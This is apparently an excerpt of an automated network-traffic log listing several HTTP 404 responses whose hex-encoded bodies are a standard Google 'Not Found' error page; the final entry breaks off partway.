                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:34 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:37 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:39 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:40 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:43 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:44 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:45 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 